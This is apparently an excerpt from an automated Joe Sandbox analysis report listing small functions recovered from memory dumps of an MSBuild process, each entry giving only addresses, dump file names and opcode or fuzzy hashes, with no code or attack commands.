                          • Instruction ID: 2574d72e8be96b20266734313bd8faca34de7dd91557207c6eb90cdfb70db264
                          • Opcode Fuzzy Hash: a9b92c085f4b3e6962033c415fe72a39ed72b325cbd33e324aa2921a878bb8a1
                          • Instruction Fuzzy Hash: FDC04C31194344CFDB159F64E88AB807BB4FF06B29F1500E5E909CB776DB29D841CB41
                          Function 05AC85D0 Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 05434a39ecf93790f9c6846e91bd2a5468ab9fcad2f5791bd3ccd7199235cfd5
                          • Instruction ID: 8cad7cac552b5a2740120257001cbbbc791f13ba9ef5eadade4951acec44739d
                          • Opcode Fuzzy Hash: 05434a39ecf93790f9c6846e91bd2a5468ab9fcad2f5791bd3ccd7199235cfd5
                          • Instruction Fuzzy Hash: ECC02B330723058BE7200358DC0C3F8330CF310131FCE4370E855818A1F364A0428094
                          Function 05AC7751 Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c83d223a6bcd0338d92985708465d606a8b0a025997511813047142e462992b9
                          • Instruction ID: a5da3c7f03c1a7a33a241c7afc0a394843f571e5bd71cc93d302dee104e4dfae
                          • Opcode Fuzzy Hash: c83d223a6bcd0338d92985708465d606a8b0a025997511813047142e462992b9
                          • Instruction Fuzzy Hash: 25C04C31151604CFC7409B54F54A7407B74EB49B15F551494E5098B622C725D8159B40
                          Function 05AC6E50 Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a97e20d8420046040f06545f2687adfc124f89f91647eeb7a5d2669d90613c99
                          • Instruction ID: dcd090ff7a2c5d5837d8f1fa1e4c47f1d4aa0ea0d12eb4a718bb28be8f669cc6
                          • Opcode Fuzzy Hash: a97e20d8420046040f06545f2687adfc124f89f91647eeb7a5d2669d90613c99
                          • Instruction Fuzzy Hash: 95C08C73000108ABD2804B01EC047897B18E320221FC14121F90242420E332E162D559
                          Function 05AC48A0 Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d8633aeff5b8559a2894a0c1ab2edfc0cc27cbf9bfc7399bbda81d81edd09df
                          • Instruction ID: a71dd9a3c21ced20dc03ebbb9d12c11bba5fb3de15d55327165880a941535df8
                          • Opcode Fuzzy Hash: 2d8633aeff5b8559a2894a0c1ab2edfc0cc27cbf9bfc7399bbda81d81edd09df
                          • Instruction Fuzzy Hash: C6C02BF18483C51FE74301D1100438F371A0F337C3F97009A8C04450A29322C4404900
                          Function 058F8F8A Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b5ed7297bbdf033ca2ae113bc26e441cd05b54d18f07d6008e97b965e3f9a5f7
                          • Instruction ID: d282867a96788503abfa3ab8a61be31fb1946cc5c394c4d701c7e9c723d45bfc
                          • Opcode Fuzzy Hash: b5ed7297bbdf033ca2ae113bc26e441cd05b54d18f07d6008e97b965e3f9a5f7
                          • Instruction Fuzzy Hash: 3AC09B312441145BC345D594DD41D18B759D6C4518358C0EDAC1CDBB42CB77E8034594
                          Function 05AAE692 Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 99ba0a580a62ae39fa2075cd6a9a13b292e3353ebfa504b30a2e1b961aca7f93
                          • Instruction ID: c9c2443c50598c4d58a3781e8784ab65157834692fbe1c2f6645c74c84c0c160
                          • Opcode Fuzzy Hash: 99ba0a580a62ae39fa2075cd6a9a13b292e3353ebfa504b30a2e1b961aca7f93
                          • Instruction Fuzzy Hash: 56D012B21882408FD300CFA4E844AA1BBB5AF28352B2A41A2E9048B3B2C222C810DB10
                          Function 05AC46F8 Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 436519d329ffee139dca217eeab0b122bdc21bdd033732cb555a215e6954da4a
                          • Instruction ID: 5f918ac376ba407a71ed2639c3fcabe98a48e275434f65a5eb61f1e37bfaa97d
                          • Opcode Fuzzy Hash: 436519d329ffee139dca217eeab0b122bdc21bdd033732cb555a215e6954da4a
                          • Instruction Fuzzy Hash: D0C08C7310A248EFDB014BA1CE013563B729B10306F65802AE485884B1C33AC020DA11
                          Function 05AC360B Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ea14ff07adee848553db91d577b6cf1cd1cf7113ba419d62e5c601fa7bbcfbdf
                          • Instruction ID: e540f02dddd128e4628e5d81a3ad8982afece811528e805acaf449dc291e7ece
                          • Opcode Fuzzy Hash: ea14ff07adee848553db91d577b6cf1cd1cf7113ba419d62e5c601fa7bbcfbdf
                          • Instruction Fuzzy Hash: D3B092312481186B8644D698ED92914B7A9DA9861A798C0ADA80CDB306CB73E8038588
                          Function 05AC4880 Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8560a482ac497427a2a0fd68da5e96cb49451c5455e49ccd8774a3df83acb071
                          • Instruction ID: 61af1cd37e4d7949c4734d545128ca45119aa572a817d18edc2b112072041238
                          • Opcode Fuzzy Hash: 8560a482ac497427a2a0fd68da5e96cb49451c5455e49ccd8774a3df83acb071
                          • Instruction Fuzzy Hash: CCC02BB28443092BD740069050803B7675C9F631A0F031866DC85D00A8E310C4018400
                          Function 05AC62CB Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1121650c72518f58f34cae4274d585866f196f0c2f5d10a8c0779d1d312693e7
                          • Instruction ID: 0a2113b5c9ccc15b103fb666036e47408cbdcb4bd4d3d02c9c0f04670e7a0d21
                          • Opcode Fuzzy Hash: 1121650c72518f58f34cae4274d585866f196f0c2f5d10a8c0779d1d312693e7
                          • Instruction Fuzzy Hash: 28B092312482085B8248D698E982914B7A9DAA8618398C0ADA80CDB302CB33E8038584
                          Function 05AA2AB0 Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1068af9ea5522c5b3545d709ec05237d4d6592fc72d85d5872d20f9dd948a636
                          • Instruction ID: 989a94997698165e41146865bcfd934838665b880d25ba0632b5b731292a2251
                          • Opcode Fuzzy Hash: 1068af9ea5522c5b3545d709ec05237d4d6592fc72d85d5872d20f9dd948a636
                          • Instruction Fuzzy Hash: 9EC092F38A51069BF7108AA1994B7C22B50DB30364F1A2821E88AC0694EA20E683803A
                          Function 05AC77C0 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Function 05ACA734 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8fed6a9620c139db43c6b53ed32073dce0b0458b98a3a5697634af16c5615a42
                          • Instruction ID: 62bddc66cfa9a4287bd661d56e597f84fff71773d42dc4cb670cc4cc9d0054fc
                          • Opcode Fuzzy Hash: 8fed6a9620c139db43c6b53ed32073dce0b0458b98a3a5697634af16c5615a42
                          • Instruction Fuzzy Hash: C7C0923484524ADFD74207E8ACAA8E17FF5ED062A130802929C4166223E6E849A38A24
                          Function 05AC3610 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Function 05AC9081 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ec40219467fe1d369092f3d9fa17281cf384a320fb26c463175a9def7a5478be
                          • Instruction ID: f4c4109344dce20e08ffe1028c433b67b7a8869de7468cacf89ae16a2dbab272
                          • Opcode Fuzzy Hash: ec40219467fe1d369092f3d9fa17281cf384a320fb26c463175a9def7a5478be
                          • Instruction Fuzzy Hash: 24B012324C5B090FE3145FC8B8473407E594700322FC54164880CCA146C41DC1160384
                          Function 05AC4B90 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Function 05AC62D0 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Function 05ACE201 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e1522fc20225fa68599cdae0c49a6082ddfa01f0efab3084b0003218148e02a5
                          • Instruction ID: 7f959f81369ea0ad1c5522bc6d24ec333c11818fdec8a44cc1750d1e008d7963
                          • Opcode Fuzzy Hash: e1522fc20225fa68599cdae0c49a6082ddfa01f0efab3084b0003218148e02a5
                          • Instruction Fuzzy Hash: 9EB0929784994105E70685A0EA433406B15EB8200AE5D1186A54898B12E0828D408189
                          Function 058F2DB0 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Function 058F04D0 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Function 058F8CF0 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Function 058F5B60 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Function 05AAC078 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                          • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                          • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                          • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                          Function 05AC45AA Relevance: .0, Instructions: 7COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e5bbbe6d71fadea630d89b03003e7b4c3b62a6139065157876b46a06ed7cc6ed
                          • Instruction ID: 4278cb225c0f85bc63321415b8e4adb600ac72ca18e02a42b74823b63bbe1cca
                          • Opcode Fuzzy Hash: e5bbbe6d71fadea630d89b03003e7b4c3b62a6139065157876b46a06ed7cc6ed
                          • Instruction Fuzzy Hash: 4FB012718803049FC76806B4E04109E7378596135536240BFA80E543308B77D441C900
                          Function 05AC85B0 Relevance: .0, Instructions: 7COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 730abf103cc3b240bf25763d5c1c82728a73f263ba8f09bfc97d4940cb4d862d
                          • Instruction ID: a5cf1772d5f694b322c7559b6b4813ea6facbd5f6882f16f9f7828b760d1498f
                          • Opcode Fuzzy Hash: 730abf103cc3b240bf25763d5c1c82728a73f263ba8f09bfc97d4940cb4d862d
                          • Instruction Fuzzy Hash: 70C08C5250C3808F87014350AA053197A606652101B0C008AD958C10138028001882A3
                          Function 05AC3C70 Relevance: .0, Instructions: 7COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                          • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                          • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                          • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                          Function 058F708E Relevance: .0, Instructions: 7COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 86690605d3e26eaf021d98fb22e166ec89012dae8d5b18e4ab8be6d22f2b6097
                          • Instruction ID: 79d616839fc4d5ff98018b3bcaff8b96e5566e8ed2e524e1e4f05b6f5750f866
                          • Opcode Fuzzy Hash: 86690605d3e26eaf021d98fb22e166ec89012dae8d5b18e4ab8be6d22f2b6097
                          • Instruction Fuzzy Hash: 3DC04C71A0430C8BCB54DA95D44069D7671EB49210F2046158556EB245DB305C818B51
                          Function 058FA87F Relevance: .0, Instructions: 7COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a331f8f33039834f33c197f49bb623c631832da61b987b98a836115596ca487c
                          • Instruction ID: e62d7d1865fb23958f09facce06c2a2cc94799eff7bb348a75ff0a76795b41e4
                          • Opcode Fuzzy Hash: a331f8f33039834f33c197f49bb623c631832da61b987b98a836115596ca487c
                          • Instruction Fuzzy Hash: F6B01237B0001986CB14D6C8F4414DCFB30DBD4333F008033C300620008731157AC760
                          Function 058FAB80 Relevance: .0, Instructions: 7COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f4e2839fb080d70fd9d5ab266c8ff45246f4c7246a28781672dbb782ec4b6ef3
                          • Instruction ID: cfd3c94acb28e12ede7e7a80c62375d018fe088f1f186957f4485c32e65079b3
                          • Opcode Fuzzy Hash: f4e2839fb080d70fd9d5ab266c8ff45246f4c7246a28781672dbb782ec4b6ef3
                          • Instruction Fuzzy Hash: 6CB092301602088F82009A59E448C0137ACAF08A0434100D0E1088B632C621F8008A51
                          Function 058F7298 Relevance: .0, Instructions: 7COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c8fc8c6125cd7017ae13da6f4036d9893a65866573e7f157e651c94b9eb46721
                          • Instruction ID: efe135f6421f9b42ec79872326fabcfe8fbcfa060a1b1959e853e74daba683db
                          • Opcode Fuzzy Hash: c8fc8c6125cd7017ae13da6f4036d9893a65866573e7f157e651c94b9eb46721
                          • Instruction Fuzzy Hash: 4CC00235D05218CBDB40CF90D84469EBF72BB48311F208665D929A3390D6359C56CB40
                          Function 05AC85E0 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 970426c1acde936bf39dc437c07016d350ede9486bce2106a00bf11ece082963
                          • Instruction ID: c266a4e435561aba3cd45e996d5b7cfc4d79604aa6c6b72393e44ee7ff38245f
                          • Opcode Fuzzy Hash: 970426c1acde936bf39dc437c07016d350ede9486bce2106a00bf11ece082963
                          • Instruction Fuzzy Hash: 69A0243304034D43CF1013C5DC0C3F5730DF740113F0D4070740C00C0155D070400055
                          Function 05AC6E60 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 66a3fed3524d0e3b6aa34297025c286ac4a80428def4d264536e31cd63fcc3cc
                          • Instruction ID: ef242089091a22f9fd60773d12e65ea1cddc4a3d71f3d920546a8db1f1f5bae4
                          • Opcode Fuzzy Hash: 66a3fed3524d0e3b6aa34297025c286ac4a80428def4d264536e31cd63fcc3cc
                          • Instruction Fuzzy Hash: 7AB0123200010CA786005B42EC0498ABF1CD7142727004121F90404030C773E4609595
                          Function 05AC3802 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c9a85108df22d909dbce6abaa8e3cafe8f0fd0501d7a90532ee9daec6175c400
                          • Instruction ID: 8dbb55a752bc4e3d0f0e7bb1fb977e4db967234c4dcc383dba9df53563c3d6e7
                          • Opcode Fuzzy Hash: c9a85108df22d909dbce6abaa8e3cafe8f0fd0501d7a90532ee9daec6175c400
                          • Instruction Fuzzy Hash: DAB012939845480DE35002E05E6174ABA0F8750303F5A019FA45C559A2841AC0380866
                          Function 05AC85C0 Relevance: .0, Instructions: 5COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 58da1fedc9e38cddb800cbfdfff484f664adbecd91922e6d585f9b80a7697763
                          • Instruction ID: b00412a48049eed6a954916b183e8f8396f8bc9d072b109be15c46b1cdfa0731
                          • Opcode Fuzzy Hash: 58da1fedc9e38cddb800cbfdfff484f664adbecd91922e6d585f9b80a7697763
                          • Instruction Fuzzy Hash: 7990023204464CCF49406796A809B6EB76CA5546157904051B60DC65125E75645045E5
                          Function 05AC48B0 Relevance: .0, Instructions: 5COMMON
                          Download Yara Rule
                          Memory Dump Source
